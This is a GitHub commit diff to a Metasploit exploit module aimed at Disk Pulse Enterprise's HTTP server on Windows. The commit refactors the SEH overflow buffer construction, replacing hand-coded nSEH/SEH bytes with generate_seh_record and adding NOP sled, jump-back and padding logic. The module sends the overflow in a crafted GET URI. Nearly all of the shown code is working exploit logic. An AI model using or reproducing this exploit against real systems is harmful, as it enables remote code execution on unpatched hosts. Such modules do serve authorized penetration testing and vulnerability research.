Skip to content

Commit 65f2ee9

Browse files
committed
added generate_seh_record
1 parent 7db5068 commit 65f2ee9

File tree

1 file changed

+5
-6
lines changed

1 file changed

+5
-6
lines changed

modules/exploits/windows/http/disk_pulse_enterprise_get.rb

Lines changed: 5 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -32,7 +32,7 @@ def initialize(info = {})
3232
],
3333
'DefaultOptions' =>
3434
{
35-
'EXITFUNC' => 'none'
35+
'EXITFUNC' => 'thread'
3636
},
3737
'Platform' => 'win',
3838
'Payload' =>
@@ -76,13 +76,12 @@ def exploit
7676
print_status("Generating exploit...")
7777
exp = payload.encoded
7878
exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
79-
exp << "\xEB\x10\x90\x90" # nSEH - jmp short 0x12 down to next record
80-
exp << "\xDD\xAD\x13\x10" # SEH - pop ebx, pop ecx, retn - libspp.dll
81-
exp << "\x90" * 10
79+
exp << generate_seh_record(target.ret)
80+
exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
8281
exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
83-
exp << 'B' * (5000 - exp.length)
82+
exp << 'B' * (5000 - exp.length) #padding
8483

85-
print_status("Sending exploit.")
84+
print_status("Sending exploit...")
8685

8786
res = send_request_cgi({
8887
'uri' => '/../' + exp,

0 commit comments

Comments
 (0)